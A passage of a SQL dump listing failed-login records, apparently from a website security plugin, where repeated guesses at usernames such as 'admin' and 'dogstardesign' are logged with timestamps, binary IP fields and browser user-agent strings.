Safari/537.36'),(5746,8647,1629767100.020287,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(5747,8648,1629768559.287784,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1N','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(5748,8650,1629771498.394728,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(5749,8652,1629774548.907852,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5750,8654,1629777339.864284,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(5751,8655,1629778807.677735,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5752,8655,1629778807.768146,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5753,8656,1629780256.323868,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��mW�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5754,8657,1629781715.936071,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(5755,8658,1629784656.850157,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����p�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(5756,8659,1629784758.819345,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���/��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(5757,8660,1629785082.985533,1,'loginFailInvalidUsername','info',0,'\0\0\0\0\0\0\0\0\0\0��.F-�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5758,8661,1629785084.218299,1,'loginFailInvalidUsername','info@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��.F-�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5759,8662,1629785085.341189,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.F-�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5760,8663,1629785086.564440,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��.F-�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5761,8664,1629785087.926280,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��.F-�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5762,8665,1629785089.187796,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0��.F-�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5763,8666,1629785094.639818,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0��-�8�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5764,8667,1629785097.646923,1,'loginFailInvalidUsername','info@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��-�8�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5765,8668,1629785101.689797,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-�8�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5766,8669,1629785105.588262,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5767,8670,1629785109.521573,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5768,8671,1629785112.427626,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0���*t','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5769,8672,1629786124.914321,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(5770,8672,1629786124.990419,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(5771,8673,1629787595.239821,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����D�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5772,8674,1629789063.215378,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����@','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5773,8675,1629789112.073353,1,'loginFailInvalidUsername','info',0,'\0\0\0\0\0\0\0\0\0\0����x','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5774,8676,1629789113.088016,1,'loginFailInvalidUsername','info@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0����x','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5775,8677,1629789114.190184,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����x','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5776,8678,1629789115.241592,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����x','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5777,8679,1629789116.495912,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0����x','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5778,8680,1629789117.670130,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0����x','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5779,8681,1629789121.771279,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0��hnY','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5780,8682,1629789132.799014,1,'loginFailInvalidUsername','info@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���\nh�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5781,8683,1629789138.090802,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���dV�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5782,8684,1629791418.120241,1,'loginFailInvalidUsername','info',0,'\0\0\0\0\0\0\0\0\0\0���\0ʱ','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5783,8685,1629791421.728561,1,'loginFailInvalidUsername','info@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���\0ʱ','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5784,8686,1629791425.262602,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\0ʱ','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5785,8687,1629791428.859626,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0���\0ʱ','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5786,8688,1629791432.510119,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���\0ʱ','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5787,8689,1629791436.029395,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0���\0ʱ','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5788,8690,1629791445.437976,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5789,8691,1629791451.076563,1,'loginFailInvalidUsername','info@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0����d�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5790,8692,1629791456.761353,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\nc�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5791,8693,1629791463.622285,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��3�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5792,8694,1629791469.012879,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���*t\Z','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5793,8695,1629791474.354339,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0����d�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5794,8696,1629792007.945541,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(5795,8697,1629793587.125191,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��h�I�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5796,8698,1629793602.040664,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0���~��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5797,8699,1629794977.216361,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;Rz','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5798,8700,1629796467.320364,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5799,8703,1629799538.429946,1,'loginFailInvalidUsername','info',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5800,8704,1629799539.176724,1,'loginFailInvalidUsername','info@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5801,8705,1629799539.906783,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5802,8706,1629799540.735031,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5803,8707,1629799541.569524,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5804,8708,1629799542.302541,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5805,8709,1629799549.015502,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0��3�]','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5806,8710,1629799552.055500,1,'loginFailInvalidUsername','info@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5807,8711,1629799557.347217,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����JJ','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5808,8712,1629799560.355452,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����d�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5809,8713,1629799567.949344,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��Y�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5810,8714,1629799570.998358,1,'loginFailInvalidUsername','dogstyle',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5811,8715,1629801280.400978,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\"E','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5812,8716,1629814349.563055,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0��)���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(5813,8717,1629829616.882338,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3S�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5814,8718,1629829816.909909,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Wb��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5815,8719,1629830025.041185,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5816,8720,1629830231.955974,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5817,8721,1629830461.782855,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���#\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5818,8722,1629830709.262506,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5819,8723,1629830944.612896,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5820,8724,1629831199.156227,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5821,8725,1629831414.491453,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gZ�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5822,8726,1629831701.215174,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5823,8727,1629831932.999428,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5824,8728,1629832212.413647,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5825,8729,1629832515.768693,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��O���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5826,8729,1629832515.817263,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��O���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5827,8730,1629832775.108806,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���_l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5828,8731,1629833349.473855,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E$^�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5829,8733,1629833891.965024,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���-�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5830,8733,1629833892.378109,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���-�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5831,8734,1629834158.565478,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5832,8735,1629834446.338068,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��. ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5833,8736,1629834719.468971,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�t2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5834,8737,1629835019.859519,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5835,8738,1629835309.227500,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5836,8739,1629835599.767872,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5837,8740,1629836207.843228,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5838,8742,1629836795.709313,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5839,8743,1629837122.841067,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���c{)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5840,8744,1629837417.315514,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\0�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5841,8745,1629838030.476606,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5842,8746,1629838346.797140,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5843,8747,1629838622.605014,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5844,8748,1629838965.825024,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5845,8749,1629839287.074423,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E$^�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5846,8751,1629839928.229852,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5847,8755,1629841183.026870,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5848,8756,1629841500.274993,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5849,8757,1629841820.533888,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5850,8758,1629842177.640955,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k�R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5851,8760,1629842829.823957,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C͘','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5852,8763,1629844218.611619,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Ȗ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5853,8764,1629844538.000024,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@tA','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5854,8765,1629844898.574982,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5855,8766,1629845230.109011,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@vs','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5856,8767,1629845567.354393,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����R{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5857,8768,1629845917.937751,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��νUX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5858,8770,1629846652.801730,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5859,8771,1629847003.922487,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5860,8773,1629847653.438290,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����kQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5861,8775,1629848379.756977,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��j)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5862,8777,1629848855.855264,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Y���','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.3)'),(5863,8779,1629849493.062633,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5864,8782,1629850543.556821,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5865,8783,1629850918.774427,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��u,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5866,8784,1629851289.926608,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5867,8787,1629852399.185032,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5868,8788,1629852753.220014,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���m~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5869,8794,1629855048.907744,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5870,8797,1629856210.845849,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5871,8798,1629856602.905591,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E$^�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5872,8800,1629857381.994642,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5873,8801,1629857778.005648,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 